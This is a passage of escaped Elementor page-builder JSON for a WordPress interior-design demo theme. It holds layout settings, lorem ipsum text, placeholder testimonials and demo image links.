",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT INTERIOR\",\"title\":\"We provide the best\\narchitect & interior\\ndesign services\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Our signature design process comes standard\\u2026refresh, remodel, new and enjoyable design experience\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor orci ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Detail\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"015c584\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"200\",\"right\":0,\"bottom\":\"110\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"180\",\"right\":0,\"bottom\":\"70\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"animation\":\"fadeInUp\",\"animation_tablet\":\"none\",\"animation_delay\":200},\"elements\":[{\"id\":\"f11899a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"content_position\":\"top\",\"align\":\"center\"},\"elements\":[{\"id\":\"b5b032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Trust the experts for all your <strong style=\\\"color: #242424;\\\">architects &amp; interior needs.<\\/strong><\\/p>\",\"text_color\":\"#9C9C9C\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"typography_font_weight\":\"600\",\"_padding\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"60\",\"bottom\":\"15\",\"left\":\"40\",\"isLinked\":false},\"_element_width\":\"auto\",\"_background_background\":\"classic\",\"_background_color\":\"#F5F5F5\",\"align_mobile\":\"center\",\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":false},\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6c98d6d\",\"elType\":\"widget\",\"settings\":{\"text\":\"More Service\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"23\",\"right\":\"40\",\"bottom\":\"25\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/services\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept 